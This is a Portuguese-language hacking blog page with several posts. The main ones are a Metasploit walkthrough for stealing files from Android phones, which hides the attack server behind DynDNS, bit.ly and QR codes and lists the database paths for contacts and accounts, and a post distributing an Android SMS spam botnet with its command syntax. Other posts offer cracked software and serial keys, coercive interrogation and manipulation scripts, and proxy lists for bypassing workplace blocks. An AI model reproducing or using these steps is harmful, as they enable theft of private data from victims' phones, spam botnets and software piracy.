Invasão no Windows 8 através do Java Signed Applet

Este vulnerabilidade permite ao invasor obter qualquer dado de um computador como Windows 8, pois através de engenharia social como induzir os usuários.

Detecção de Intrusos com SNORT - Back|Track 5R3

Sistema de detecção de intrusão , nada mais é do que uma ferramenta capaz de identificar tentativas de invasão em tempo real.

Hackeando e obtendo informações de dispositivos Android

Uma técnica de "hackear" os dispositivos moveis com o sistema operacional Android. Vamos utilizar a ferramente já conhecida por alguns, o Metasploit.

terça-feira, 27 de novembro de 2012

Engenharia social [A Psicologia da Mentira]




Resumo (Torne-se um detector de mentiras humano Bem vocês devem está perguntando o porquê de um topico falando sobre psicologia da mentira , bem neste tópico vou mostrar-lhes como se prevenir e como detectar que estão aplicando em vocês uma Engenharia social (mentira,SEing,ES)...


"Quem tiver olhos para ver e ouvidos atentos pode convencer-se de que nenhum mortal
é capaz de manter segredo. Se os lábios estiverem silenciosos, a pessoa ficará
batendo os dedos na mesa e trairá a si mesma, suando por cada um dos seus poros!"
• Sigmund Freud


Sabemos que a honestidade é à base de qualquer relacionamento humano. Mas, muitas vezes, as pessoas deixam de ser honestas conosco. É de grande valor estar ciente das verdadeiras intenções de alguém, e isso vai lhe poupar tempo, dinheiro e energia.


O que você vai ler abaixo é baseado no resultado de anos de estudos na área do comportamento humano; principalmente do trabalho do Dr. David J. Lieberman - um renomado Ph.D. em Psicologia e Hipnoterapeuta - em seu livro: "Never be lied again", o qual me influenciou imensamente na produção deste material. Lembro que não são meramente técnicas para se descobrir a verdade, mas sim técnicas poderosas e eficazes, os quais são utilizadas mundialmente por entrevistadores e interrogadores experientes(ES criminalistica).

Chegou a hora de saber as reais intenções das pessoas e impedir que elas tirem vantagem de você! )

(Apresento-lhe os 30 sinais de uma mentira. O corpo nos revela a verdade.
Estudos demonstraram que numa apresentação diante de um grupo de pessoas, 55% do impacto são determinadas pela linguagem corporal - postura, gestos e contato visual -, 38% pelo tom de voz e apenas 7% pelo conteúdo da apresentação (Mehrabian e Ferris, "Inference of attitudes from noverbal communication in two channels", in The Journal of Counselling Psychology, vol. 31, 1967, pp. 248-52). Podemos concluir que não é o que dizemos, mas como dizemos, que faz a diferença. Sabendo disso, podemos usar a observação para nos ajudar a descobrir a verdade.

1. A pessoa fará pouco ou nenhum contato direto nos olhos;
2. A expressão física será limitada, com poucos movimentos dos braços e das mãos. Quando tais movimentos ocorrem, eles parecem rígidos e mecânicos. As mãos, os braços e as pernas tendem a ficar encolhidos contra o corpo e a pessoa ocupa menos espaço;
3. Uma ou ambas as mãos podem ser levadas ao rosto (a mão pode cobrir a boca, indicando que ela não acredita - ou está insegura - no que está dizendo). Também é improvável que a pessoa toque seu peito com um gesto de mão aberta;
4. A fim de parecer mais tranqüila, a pessoa poderá se encolher um pouco;
5. Não há sincronismo entre gestos e palavras;
6. A cabeça se move de modo mecânico;
7. Ocorre o movimento de distanciamento da pessoa para longe de seu acusador, possivelmente em direção à saída;
8. A pessoa que mente reluta em se defrontar com seu acusador e pode virar sua cabeça ou posicionar seu corpo para o lado oposto;
9. O corpo ficará encolhido. É improvável que permaneça ereto;
10. Haverá pouco ou nenhum contato físico por parte da pessoa durante a tentativa de convencê-lo;
11. A pessoa não apontará seu dedo para quem está tentando convencer;
12. Observe para onde os olhos da pessoa se movem na hora da resposta de sua pergunta. Se olhar para cima e à direita, e for destra, tem grandes chances de estar mentindo.
13. Observe o tempo de demora na resposta de sua pergunta. Uma demora na resposta indica que ela está criando a desculpa e em seguida verificando se esta é coerente ou não. A pessoa que mente não consegue responder automaticamente à sua pergunta.
14. A pessoa que mente adquire uma expressão corporal mais relaxada quando você muda de assunto.
15. Se a pessoa ficar tranqüila enquanto você a acusa, então é melhor desconfiar. Dificilmente as pessoas ficam tranqüilas enquanto são acusadas por algo que sabem que são inocentes. A tendência natural do ser humano é manter um certo desespero para provar que é inocente. Por outro lado, a pessoa que mente fica quieta, evitando a todo custo falar de mais detalhes sobre a acusação;
16. Quem mente utilizará as palavras de quem o ouve para afirmar seu ponto de vista;
17. A pessoa que mente continuará acrescentando informações até se certificar de que você se convenceu com o que ela disse;
18. Ela pode ficar de costas para a parede, dando a impressão que mentalmente está pronta para se defender;
19. Em relação à história contada, o mentiroso, geralmente, deixa de mencionar aspectos negativos;
20. Um mentiroso pode estar pronto para responder as suas perguntas, mas ele mesmo não coloca nenhuma questão.
21. A pessoa que mente pode utilizar as seguintes frases para ganhar tempo, a fim de pensar numa resposta (ou como forma de mudar de assunto): "Por que eu mentiria para você?", "Para dizer a verdade...", "Para ser franco...", "De onde você tirou essa idéia?", "Por que está me perguntando uma coisa dessas?", "Poderia repetir a pergunta?", "Eu acho que este não é um bom lugar para se discutir isso", "Podemos falar mais tarde a respeito disso?", "Como se atreve a me perguntar uma coisa dessas?";
22. Ela evita responder, pedindo para você repetir a pergunta, ou então responde com outra pergunta;
23. A pessoa utiliza de humor e sarcasmo para aliviar as preocupações do interlocutor;
24. A pessoa que está mentindo pode corar, transpirar e respirar com dificuldade;
25. O corpo da pessoa mentirosa pode ficar trêmulo: as mãos podem tremer. Se a pessoa estiver escondendo as mãos, isso pode ser uma tentativa de ocultar um tremor incontrolável.
26. Observe a voz. Ela pode falhar e a pessoa pode parecer incoerente;
27. Voz fora do tom: as cordas vocais, como qualquer outro músculo, tendem a ficar enrijecidos quando a pessoa está sob pressão. Isso produzirá um som mais alto.
28. Engolir em seco: a pessoa pode começar a engolir em seco.
29. Pigarrear: Se ela estiver mentindo têm grandes chances de pigarrear enquanto fala com você. Devido à ansiedade, o muco se forma na garganta, e uma pessoa que fala em público, se estiver nervosa, pode pigarrear para limpar a garganta antes de começar a falar.
30. Já reparou que quando estamos convictos do que estamos dizendo, nossas mãos e braços gesticulam, enfatizando nosso ponto de vista e demonstrando forte convicção? A pessoa que mente não consegue fazer isso. Esteja atento.

Armando-se para a batalha verbal e partindo para o ataque

Chegou a hora de usarmos um sofisticado e abrangente sistema de questionamentos que fará com que qualquer pessoa fale a verdade em apenas alguns minutos em qualquer conversa ou situação. Vou lhe armar com as melhores munições possíveis para que você vença rapidamente a batalha verbal e chegue até a verdade. Os resultados serão verdadeiramente surpreendentes.

Importante: Não esqueça de observar as respostas não-verbais (inconscientes) - os sinais que você acabou de aprender - após a sua pergunta.

1.Não acuse - Insinue: O objetivo é fazer uma pergunta que não represente nenhuma acusação, mas que insinue o possível comportamento da pessoa. Exemplo de uso:
Suspeita: Você acha que seu (a) namorado (a) foi infiel na noite passada.
Pergunta incorreta: "Você andou me traindo?"
Pergunta correta: "Aconteceu alguma coisa diferente na noite passada?"
Observe sua expressão corporal e alguma possível pista de preocupação e nervosismo com sua pergunta. Qualquer resposta do tipo: "Porque perguntou isso?" ou "Alguém te falou alguma coisa?", seguidas de um certo nervosismo, indicam forte preocupação por parte da pessoa. Ela não estaria preocupada em saber porque você está fazendo tal pergunta, a menos que pense que você pode estar sabendo o que ela não quer que você saiba.

2.Situação semelhante: Aqui você vai apresentar uma situação semelhante à que suspeita que esteja acontecendo. O bom é que vai poder falar sobre o assunto sem parecer acusatório. Exemplo de uso:
Suspeita: Você acha que seu (a) namorado (a) está lhe traindo.
Pergunta incorreta: "Você está me traindo com Fulana (o) de Tal?"
Pergunta correta: "Sabe, minha (meu) amiga (o) Fulana (o) de Tal me disse que está muito desconfiada (o) do (a) seu (sua) namorado (a). Ela (e) tem quase certeza que ele (a) está cometendo uma traição. Ele (a) fica muito estranho (a) e nervoso (a) quando ela (e) fala sobre histórias de traição. O que você acha disso?" Se a pessoa for culpada, ficará preocupada, constrangida ou embaraçada e vai querer rapidamente mudar de assunto. Porém, se a pessoa achar que sua pergunta é interessante e ela for inocente, poderá iniciar uma conversa a respeito da pergunta. Esta é uma forte indicação de inocência, porque ela não tem receio de discutir o tema e não está investigando por quê você faz a pergunta.

3.Não é surpreendente?: Como no exemplo acima, aqui você vai abordar o assunto, mas de uma forma geral. Nos permitirá uma grande percepção de culpa ou inocência da pessoa. Exemplo de uso:
Suspeita: Você desconfia que seu (sua) noivo (a) está saindo com outra (o)
Pergunta incorreta: "Você está saindo com outra (o)?"
Pergunta correta: "Olha que absurdo... Hoje minha (meu) amiga (o) Fulana (o) de Tal me contou que pegou seu (a) noivo (a) com outra (o). Não é impressionante como alguém consegue ser infiel e não ter receio de ser desmascarado?" Quaisquer respostas que demonstrem reações de embaraço, nervosismo ou constrangimento, seguidas de perguntas como: "Por que está me perguntado isso?", além de tentativas de mudança de assunto, demonstram grande carga de preocupação e culpa.

4.Atacando o ego da pessoa. Aqui vamos usar o ego da pessoa contra ela própria. Vamos dizer a ela que jamais seria capaz de confessar, pois está sendo 'pressionada' por outra pessoa à não dizer a verdade e que essa pessoa manda nela. Esta técnica é muito usada por policiais. Exemplo de uso:
Suspeita: Você tem quase certeza que Fulano (a) roubou sua empresa
Pergunta incorreta: "Vai confessar que roubou minha empresa, ou não?"
Pergunta correta: "Acho que já sei qual é o problema: Você não me diz a verdade porque alguém manda em você. Você não tem o poder para decidir isso. Tem outra pessoa por trás disso e você não quer 'ficar mal' com ela, não é?" O mais incrível é que geralmente as pessoas acabam confessando e se sentindo orgulhosas de ter feito isso.

5.Indução: Aqui está uma poderosa técnica. Particularmente, já utilizei e obtive ótimos resultados. Elabore uma pergunta que restrinja sua resposta a algo que a pessoa pense ser positivo, de forma que ela não se importe em responder sinceramente. Exemplo de uso:
Suspeita: Alguém viu seu (a) namorado (a) numa festa na noite passada.
Pergunta incorreta: "Você andou fazendo festa escondido de mim?"
Pergunta correta: "Ontem, você chegou em casa após as 24h, não foi?" Se a pessoa tiver ficado em casa, ficará livre para responder, mas se tiver, realmente saído, mesmo assim se sentirá a vontade em responder sinceramente, porque você deu a entender que já sabia e não havia problemas. O fato de a pessoa ter voltado para casa de madrugada não está em questão. O importante é que você conseguiu a resposta à verdadeira pergunta.

6.Bumerangue psicológico: Com esta técnica, você diz à pessoa que ela fez algo bom, e não mau. Assim, ela ficará, completamente livre para lhe dizer toda a verdade. Exemplo de uso:
Suspeita:Você suspeita que fulano (a) está roubando sua empresa.
Pergunta incorreta:"Fulano (a), você anda me roubando?"
Pergunta correta:"Ei, Fulano (a)! Acho que podemos nos tornar sócios muito ricos! Parece que você, ultimamente, tem 'passado à perna' em mim, mas está tudo bem. Nós podemos trabalhar juntos, seu (sua) espertinho (a)! Me conte mais sobre suas incríveis técnicas... Quero aprender tudo!" Você quer aparentar que está contente por saber o que a pessoa está fazendo. Ela não terá saída e vai se abrir para você.

Outro exemplo: (Utilizado em entrevistas para emprego)
Suspeita: Você suspeita que o candidato à vaga oferecida mentiu sobre as informações em seu currículo.
Pergunta incorreta:"Fulano (a), você andou colocando informações falsas em seu currículo?"
Pergunta correta:"Fulano (a), nós dois sabemos que todo mundo inventa um pouco sobre seu currículo. Pessoalmente, acho que isso demonstra coragem, porque a pessoa não tem medo de assumir novas responsabilidades. Me diga, quais partes em que você foi mais criativo no seu currículo?"


Técnicas avançadas para revelar a verdade
Os truques dos profissionais.
As técnicas abaixo devem ser usadas caso você esteja muito desconfiado da pessoa e ela se recusa a confessar.

1.Céu e inferno:
Esta técnica cria uma espécie de fobia na pessoa e a única saída é confessar a verdade para você. Aqui usamos as forças que moldam o comportamento humano: Dor e o Prazer nos seus limites para nos revelar a verdade. Exemplo de uso:
Se você acha que sua colega de trabalho está roubando o material de escritório da empresa. Você falaria: "Fulana, já sei da verdade. Sei também que você já Esta técnica cria uma espécie de fobia na pessoa e a única saída é confessar a verdade para você. Aqui usamos as forças que moldam o comportamento humano: Dor e o Prazer nos seus limites para nos revelar a verdade. Exemplo de uso:
Se você acha que sua colega de trabalho está roubando o material de escritório da empresa. Você falaria: "Fulana, já sei da verdade. Sei também que você já está se arrependendo de ter feito isso. Podemos resolver isso agora. Você pode me contar tudo e esquecemos isso para sempre. Ninguém mais ficará sabendo e você continuará no seu emprego. Mas, pode escolher um caminho mais doloroso: Posso ir até nosso chefe e falar para ele. Você sabe que isso seria demissão na certa, não é? Além do mais sua imagem ficaria suja. Imagina todos seus colegas comentando sobre o que você fez? Portanto, para o seu bem, me confesse agora e terminamos com isso de uma vez por todas". Se vincularmos dor intensa e insuportável à idéia de mentir e prazer imediato à idéia de falar a verdade, ela só terá uma saída: falar a verdade!

2.Curto circuito
Fulano (a). Eu não quero que você diga nada, a menos que, realmente, queira. E entendo que você já esqueceu o que havia pensado em querer, não é? Se estiver pensando consigo mesmo algo como... eu quero dizer à você, então simplesmente... diga ... Quando perceber que... esta é a decisão certa...você... irá me dizer a verdade... agora!
Importante:
•Antes e depois do comando - que está em negrito - você deve dar uma pausa (...)
•Ao dar o comando, aumente um pouco a voz e utilize uma tonalidade descendente.
•Gesticule com as mãos ao dizer o comando.
Você também pode usar a técnica do curto circuito, com o intuito de apenas interromper a linha de raciocínio de uma pessoa. Utilize as frases abaixo quando quiser tomar o controle de uma conversa, ou temporariamente confundir a pessoa, enquanto você reúne seus próprios pensamentos. Abaixo você tem algumas frases que desenvolvi. Não esqueça de gesticular enquanto fala. Use com moderação. Se usar várias delas seguidas, poderá provocar uma forte confusão mental na pessoa.

3.Criações do inconsciente:Esta técnica utiliza comandos implícitos de um modo totalmente novo. Você vai oferecer uma sugestão que cria uma ação perceptível. Exemplo de uso:
"Fulana, eu não estou dizendo que você deverá ...enrijecer seu corpo... se ...estiver mentindo" Se ela for mesmo culpada, o inconsciente se encarregará de dar uma resposta.

FONTE : planetavirtuall

quinta-feira, 22 de novembro de 2012

Dc Unlocker + Crack

Para quem ainda não conhece, o DC Unlocker é o melhor programa para desbloquear celulares e modens via hardware (USB) que existe. Disponibilizo aqui, uma versão crackeada. Para instalar:
  1. Primeiro você deverá baixar o DC, pelo link do site oficial. clique aqui.
  2. Após baixar o zip, quando abri-lo você encontrará o arquivo dc-unlocker_client-1.00.0597_2.exe.
  3. Basta instalá-lo.
CRACK


SENHA: ghufran

quarta-feira, 21 de novembro de 2012

Recuperar dados de documentos do Word


Existem duas situações quando falamos de recuperar arquivos do Word. Uma é quando você tem o arquivo corrompido em mãos e deseja reparar o arquivo para obter a informação que está contida nele. O segundo caso, é quando você esta escrevendo no Word e, por algum motivo, fechou o editor e perdeu o texto escrito.

Logo mais abaixo mostro dicas de como você pode reaver seu texto em cada caso.

1- Como recuperar arquivos corrompidos do Word

Uma forma de extrair o texto do seu arquivo corrompido, é usando uma ferramenta que já existe no Word. Outro jeito é usando programa de terceiros.

1.1 – Usando a própria ferramenta do Word
Os documentos do Word são gravados em formato binário, mas a informação principal fica mesmo é em formato texto. Por este motivo, o Word tem uma ferramenta chamada: “Recover Text from Any File” que extrai o texto de qualquer arquivo (não só de .docs!!!).

Então, se você recuperar um arquivo .doc que está dando problemas para abrir no Word, você pode usar esta ferramenta para poder extrair o texto do .doc danificado. Só lembre-se que a formatação, as imagens etc… não serão recuperados.

Para usar a ferramenta é muito simples:


  • No Microsoft Office Word 2007, clique no botão Microsoft Office, e depois clique em Abrir.
  • No Microsoft Office Word 2003 ou 2002, clique em Abrir no menuArquivo.
  • Na caixa “Arquivos do Tipo”, clique em “Recuperar texto de qualquer arquivo (*,*)”.
  • Selecione o documento que você desejar para recuperar o texto.
  • Clique em Abrir.
1.2- Usando programa de terceiros
O programa que eu indico é o WordRepair. Ele é fácil de usar, mas este programa também não preserva a formatação original do arquivo. Ele só vai extrair o texto.


Tudo o que você tem que fazer é clicar em “Repair/Open” e depois salvar o texto em um arquivo .rtf.


Depois você pode abrir o .rtf no Word para visualizar o texto.


2- Como recuperar arquivos após o Word ser fechado

O Word salva por padrão uma cópia, de dez em dez minutos, do arquivo que vocês está escrevendo. Ele faz isso para que caso o sistema tenha alguma pane, o usuário consiga continuar o trabalho de onde parou.

Em caso de pane a recuperação é automática. Mas há casos em que a pessoa fecha o editor e esquece de salvar o documento. Quando vai abrir o arquivo maos tarde, percebe que não tem mais nada. Se essa é sua situação, você pode tentar o seguinte:


1.Clique em Iniciar e em Pesquisar.
2.Clique em Todos os arquivos e pastas em Assistente de busca à esquerda no Windows Explorer.
3.Na caixa Todo ou parte do nome do arquivo:, digite *.ASD.
4.Na caixa Examinar, clique em Meu computador.
5.Clique em Pesquisar.
Se encontrar arquivos com a extensão .asd, execute as seguintes etapas:
a.Inicie o Word.
b.Execute uma das seguintes ações:
No Word 2007, clique no Botão do Microsoft Office e em Abrir.
No Word 2003, clique em Abrir no menu Arquivo.
c.Na lista Arquivos do tipo, clique em Todos os arquivos *.*.
d.Localize e selecione o arquivo .asd.
e.Clique em Abrir.
f.Reinicie o computador.
g.Inicie o Word.


Se o Word encontrar o arquivo de AutoRecuperação, o painel de tarefas Recuperação de documentos é aberto no lado esquerdo da tela e o documento que está faltando é listado como nome do documento [Original] ou como nome do documento [Recuperado]. Se isto ocorrer, execute uma das seguintes ações:


No Word 2007, clique duas vezes no arquivo no painel de tarefasRecuperação de documentos, clique no Botão Microsoft Office, emSalvar como e salve o documento como um arquivo .docx.
No Word 2003, clique duas vezes no arquivo no painel de tarefasRecuperação de documentos, clique em Salvar como no menu Arquivo e salve o documento como um arquivo .doc.


Você também pode fazer uma busca por arquivos *.ASD com o programa de recuperação de dados “PCI File Recovery“, caso não consiga achar o seu arquivo usando os passos acima.

sábado, 17 de novembro de 2012

Wondershare PDF Password Remover v1.3.0.3 and Serial Key


PDF Password Remover é projetado para remover senhas e restrições de arquivos PDF. Basta pressionar o botão direito do mouse no arquivo PDF, selecione Decrypt with Wondershare PDF Password Remover a partir do menu de atalho, as restrições serão removidas em segundos. É fácil para você copiar, modificar ou imprimir os arquivos PDF depois da descriptografia.

TAMANHO: 4.77 MB
Arquivo TORRENT
Instalação
1- Descompacte os arquivos. 
2- Use o serial contido no zip para registrá-lo.
3-Use!

Lista dos melhores web proxys existentes


É certo que em algum momento de sua vida pessoal você precisará de um web proxy, seja para abrir um site bloqueado em sua empresa, extrair informações sigilosas sob anonimato ou até mesmo bloquear este proxy na black list de seu fire wall empresarial. Vou colocá-los na ordem de mais importantes para menos:

Lista 1 Lista 2
http://anonymouse.ws/
http://www.proxyking.net/
http://www.proxyking.net/
http://www.anonymousindex.com/
http://www.hidemyass.com/
http://www.proxy7.com/
http://www.proxyfoxy.com/
http://www.78y.net/
http://www.75i.net/
http://www.dzzt.com/
http://www.proxyguy.com/
http://www.proxyz.be/
http://www.proxyhero.com/
 http://www.proxydrop.com
http://www.proxydrop.net
http://www.proxydrop.biz
http://www.proxydrop.info
http://www.proxydrop.org
http://www.prx1.com/
http://www.ninjaproxy.com/
http://www.shadowsurf.com/
http://www.famous5.net/
http://www.no1proxy.com
http://www.theproxy.be
http://www.newproxy.be
http://www.smartproxy.net
http://www.proxyprince.com/
http://pimpmyip.com/
http://ohmyproxy.com/
http://www.unblockmyspace.com/
http://www.proxyforall.com/
http://www.myproxysurfer.com/
http://www.proxycat.com/
http://www.proxydetective.com/
http://www.indianproxy.com/
http://www.proxybrowsing.com/
http://www.proxypi.com/
http://www.proxyjet.com/
http://www.justhide.com/
http://www.anonymization.net/
http://www.guardster.com/
http://www.proxyweb.net/
http://webwarper.net/
http://www.megaproxy.com
http://www.amegaproxy.com
http://www.w3privacy.com/
http://www.anonymizer.ru/
http://www.the-cloak.com/
http://www.pureprivacy.com/
http://proxify.com/
http://www.urlencoded.com/
http://www.snoopblocker.com/
http://www.long999.com/
http://www.psurf.net/
http://www.phproxy.info/
http://www.proxy121.com/
http://www.bigate.com/cgi-bin/bigate/b/k/k/
http://www.userbeam.de
http://www.calcmaster.net
http://www.misterprivacy.com/begin_anonymous_surfing.htm
http://www.myshield.com
http://www.idzap.com
http://www.safegatetech.com
http://www.breiter.ch/
http://www.rrdb.org/rrdbproxy.php?l=en
http://proxy.decodes.biz/
http://proxy.mxds.ch/
http://www.spondoo.com/
http://search.sicomm.us/
http://schnarre-monika.celebrityblog.net/cache.cgi
http://filter2005.com/
http://www.kproxy.com/
http://www.websitereactor.org/cgi-bin/001/nph-.pl
http://www.goproxing.com/
http://anonycat.com/
http://www.spynot.com/
http://www.merletn.org/anonymizer
http://www.cgi-proxy.net/
http://www.proxymouse.com/
http://www.theunblocker.tk/
http://www.betaproxy.com/
http://www.letsproxy.com/
http://www.freeproxysurf.info/
http://www.mysticproxy.com/
http://www.proxywave.com/
http://www.vtunnel.com/
http://www.proxysnail.com/

http://www.freeproxy.ca/
http://basic.3proxy.com/
http://www.privatebrowsing.com/
http://www.hackingtruths.org/proxy
http://xanproxy.be/ http://www.ipsecret.com/
http://www.proxyanon.com/
 http://www.anonproxy.info/ http://www.proxysafe.com/ http://www.strongproxy.com/ http://www.boredatschool.net/ http://www.ukproxy.com/ http://www.simpleproxy.com/ http://www.phproxy.org/ http://surfonym.com/ http://geoepker.hu/freeproxy/
http://www.browseatwork.com/ http://www.ipblocker.info/ http://www.boredatwork.info/
http://www.anonymousurfing.info/
http://www.browsingwork.com/ http://www.freeproxyserver.org/ http://www.browseany.com/ http://www.browsesecurely.com/
http://IEproxy.com/ http://www.sneak3.po.gs/ http://www.proxytastic.com/
http://www.freewebproxy.org/ http://www.thecgiproxy.com/ http://www.hide-me.be/ http://www.anotherproxy.com/
http://www.proxy77.com/
http://www.surf-anon.com/
http://www.free-proxy.info/
http://www.theproxysite.info/
http://www.proxyify.info/ http://www.concealme.com/ http://browseschool.info/ http://browsework.info/
http://browsingschool.info/
http://browsingwork.info/
http://browsingschool.com/
http://www.proxyindex.com/
http://www.gobyproxy.com/
http://www.proxifyme.com/
http://www.proxyghost.com/
http://www.spysurfing.com/
http://www.unblockthis.com/
http://www.proxyserver7.com/
http://www.daveproxy.co.uk/
http://www.tntproxy.com/
http://www.neoproxy.net/
http://www.bypassbrowser.com/
http://www.procksie.com/
http://www.httproxy.com/ http://www.cgiproxy.info/ http://www.silentsurf.com/cgi-bin/nph-index.cgi
http://www.proxy-sock.com/
http://www.proxygeek.com/
http://www.datadefense.org/
http://www.hideyour.info/
http://www.howto.pro/
http://www.collegeproxy.com/
http://www.demonproxy.com/
http://www.satanproxy.com/
http://www.hidingyou.com/
http://www.intelliproxy.com/
http://www.fireprox.com/
http://www.h0h0h0.com/firewall/
http://www.katedrala.cz/
http://www.browseatwork.net/
http://www.2255.info/ http://www.vproxy.be/ http://www.boxproxy.com/
http://www.nopimps.com/ http://www.fsurf.com/ http://www.proxylord.com/
http://roachhost.com/hp/
http://www.freepr0xy.com/
http://www.proxypop.com/ http://proxy.winidn.com/
http://www.cloax.net/
http://www.proxy247.com/
http://www.traceless.com/
http://www.siatec.net/proxyanonymizer
http://www.stealth-ip.net/
http://www.proxywhip.com http://www.proxy-surf.net/
http://www.videoeditors.info/proxy/
http://www.blockmy.info/
http://www.proxychatroom.com/
http://www.teenpropy.com/
http://www.totalupload.com/surf/
http://www.proxene.com/
http://www.fileshack.us/proxy.php
http://www.cloaker.ca/
http://www.proxified.net/ http://www.mrreid.net

terça-feira, 13 de novembro de 2012

Como desligar o seu computador com telefone celular - Por E-Mail


Usando este método, um usuário pode desligar, reiniciar, hibernar e etc, seu computador, basta enviar um e-mail de seu telefone.

Para fazer isso, tudo o que você precisa é o Microsoft Outlook, que deve vir com o Microsoft Office, o que a maioria das pessoas tem. Isto terá de ser no computador que gostaria que desligasse.

Então, essa é a forma como você fará isso:


Primeiro, você precisa dos arquivos em lote para executar o desligamento, Hibernate, etc. Caso saiba escrever não é necessário baixar, caso nao você pode baixá-lo aqui.

Você deve extrair o arquivo para a unidade C: ,ficando assim : C:\sms_functionsshutdown.bat (Importante esta é uma obrigação, o caminho deve ser exato), ou você pode modificar a regra, uma vez de importá-lo para apontar para o novo destino, é a sua chamada. Mas recomendo deixar com é descrito a cima.

Abra o Microsoft Outlook. Certifique-se de que você já tenha configurado para o seu e-mail. Agora teremos que fazer com que o Outlook verifica sua caixa de entrada a cada minuto (1 minuto para o tempo de teste, pode ser aumentado de acordo com o desejado). Vá em Ferramentas: Opções.

Em seguida, clique na guia Configuração de correio, e depois, no botão Enviar/Receber.

Certifique-se de que o Agendador envio/recebimento automático está marcada, e defina o número de minutos intervalo. Agora você pode fechar todas as caixas de diálogo.

Agora vá para Ferramentas: Regras e Alertas ... Em seguida, clique no botão de opções no canto superior direito e pressione o botão Importar Regras.

Agora selecione o arquivo shutdown.rwz que foi encontrado no arquivo zip chamado sms_functions que você baixou.

Agora, quando você envia uma mensagem de seu celular para seu endereço de e-mail com o assunto smsshutdown%%, o computador será desligado.




Você também pode fazer a sua própria regra, de modo que você pode usar seu próprio arquivo de lote, e pode especificar a frase que você deseja acionar a ação.



domingo, 11 de novembro de 2012

Achando senhas padrões de modems

Bom, essa é uma pequena ferramenta que serve para muitos que trabalham com redes ou até mesmo um usuário comum que precisa acessar o painel de seu modem, pois é, estava com esse problema com alguns clientes e fui buscar no nosso supremo Google as senha padrões de modems, foi-se necessário alguns minutos do meu tempo, com vários links falhos até que encontrei um em outros cantos da internet e que me deu o suporte necessário para a minha necessidade, espero que possa lhe ajudar. O link segue a baixo, basta escolher o modelo e logo em seguida ele lhe mostrará as possíveis senhas padrões.


Link : ACESSAR

Fazendo Botnet de SMS no Smartphone (Android)

Olá a todos. Desta vez eu trago um artigo muito interessante que eu encontrei, é um botnet para celulares com Android, a função principal é a de infectar muitos celulares, e depois por comandos, realiza alguma ação. Neste caso é enviar sms.


Uma botnet é uma coleção de agentes de software ou bots que executam autonomamente e automaticamente. O termo é geralmente associado com o uso de software malicioso, mas também pode se referir a uma rede de computadores utilizando software de computação distribuída.





O comando para execução é:
BOT: SPAM {numero para o spam} {mensagem}

Ex : BOT: SPAM {7399654468} {Olá! Visite nosso Blog! hchost.blogspot.com}



DOWNLOAD
Demostração em Vídeo
Documentação ( Tutorial PDF - INGLÊS )
Release



quinta-feira, 8 de novembro de 2012

Hackeando e obtendo informações do SmartPhones com Android no Metasploit

Nesse arrigo estaremos abordando uma técnica de "hackear" os dispositivos moveis
hackear o androif
com o sistema operacional Android. Vamos utilizar a ferramente já conhecida por alguns, o Metasploit com um auxiliar de sua biblioteca  que pode ser encontrada no Sistema operacional BackTrack. Isso pode ser possível quando um dispositivo esta conectado em sua rede local, Mas usaremos  o DynDNS que nos da um alcance melhor do ataque, e veremos como ofuscar o endereço através de codigos QR e site que encurtam links como o bit.ly .

Vamos começar!

Roubar arquivos android_htmlfileprovider

A primeira coisa é começar o msfconsole no terminal do backtrack


  1. root@bt:~# /opt/framework3/msf3/msfconsole
Agora vamos usar um dos módulos auxiliares do Metasploit, que serve exatamente para  o nosso objetivo:
  1. msf > use gather/android_htmlfileprovider
  2. msf auxiliary(android_htmlfileprovider) >
Agora, vamos ver as opções que oferece o módulo...
  1. msf auxiliary(android_htmlfileprovider) > show options
  • FILES (arquivos do Android que queremos roubar) 
  • SRVHOST (IP local que estará a espera de conexões)
  • SRVPORT (A porta que estará a espera de conexões)
  • SSL (ALTERNATIVA - Se queremos usar SSL para negociação da conexão)
  • SSLVersion (Se tiver ativado a opção acima, indique a versão do  SSL )
  • URIPATH (A URI que será utilizada)
No momento , não vamos tocar na opção FILES. Já na opção SRVPORT mudará para 80, uma vez que é a porta http normal, e será mais suspeito se conectar-se a uma outra porta. Além disso URIPATH também vai mudar, que por padrão é uma seqüência aleatória, a vítima será direcionado para a raiz do servidor, faça com a baixo:

  1. msf auxiliary(android_htmlfileprovider) > set SRVPORT 80
  2. SRVPORT => 80
  3. msf auxiliary(android_htmlfileprovider) > set URIPATH /
  4. URIPATH => /
Agora só podemos começar a façanha usando o comando run, e esperar algum dispositivo conectar ao nosso IP ouvinte.

Veja a Imagem abaixo:

Exploit Executado - CLIQUE PARA AMPLIAR
Usando DynDNS para aumentar o alcance

Como dizemos, se fizermos esse ataque só para redes locais (LAN), como smartphones não costumam passar muito tempo conectado a uma rede Wi-Fi que estamos interessados. Mas é possível aumentar essa exploração, para fazer isso, neste caso vamos usar o DynDNS, que é um serviço que fornece o endereçamento dinâmico de domínio tipo site.dyndns *. Org .

Temos que ir no site da  http://dyn.com/ e criar uma conta. Após isso, pode registrar o domínio que escolhemos. Após este iria para as configurações do roteador e indicar o domínio, o nome de usuário e senha, como você pode ver (em outros roteadores pode ser diferente).

CLIQUE PARA AMPLIAR
Devo dizer que DynDNS é um serviço excelente. Depois de configurar o domínio DynDNS só precisa redirecionar corretamente no ip do roteador. Ou seja, no nosso caso, a vítima irá se conectar ao vidasconcurrentes.dyndns.org (na porta 80) e deve ser definida para ir para a porta IP em que ouvimos o exploit.

CLIQUE PARA AMPLIAR


Ofuscando o ataque com códigos QR e bit.ly

Temos tudo para o ataque,  teria que passar a url para as vítimas e esperar por ele para se conectar. O problema é que um estilo vidasconcurrentes.dyndns.org url pode ser bastante suspeito. Neste caso, use um encurtador de URL, usaremos o  bit.ly  ( pode se encontrar vários). 

Finalmente, se quisermos um ataque mais viral, podemos criar um código QR (http://qrcode.kaywa.com/) usando o link  que o encurtador de link do  bit.ly nos deu  , sendo ainda mais difícil de detectar.
O QR vai estar camuflado com o link do Bit, veja o EX :  http://bit.ly/q9wRCW , que redireciona para o domínio criado no DynDNS, o vidasconcurrentes.dyndns.org, que estará com o exploit a escuta.. Veja o Exemplo do QR.

CLIQUE PARA AMPLIAR

Tendo sucesso em sua invasão, basta usar a criatividade para explorar, alguns diretorios do android em especial estará listados a baixo:

Banco de Dados de Contatos

/data/data/com.android.providers.contacts/databases/contacts.db

Banco de Dados do Browser
/data/data/com.android.browser/databases/browser.db

Banco de Dados de Contas
/data/data/com.google.android.googleapps/databases/accounts.db

Banco de Dados de Geolocalização
/data/data/com.android.browser/gears/geolocation.db

Diretório de Banco de Dados do Telefone
/data/data/com.android.providers.telephony/databases/

Banco de Dados de historicos
/data/data/com.google.android.apps.maps/databases/search_history.db

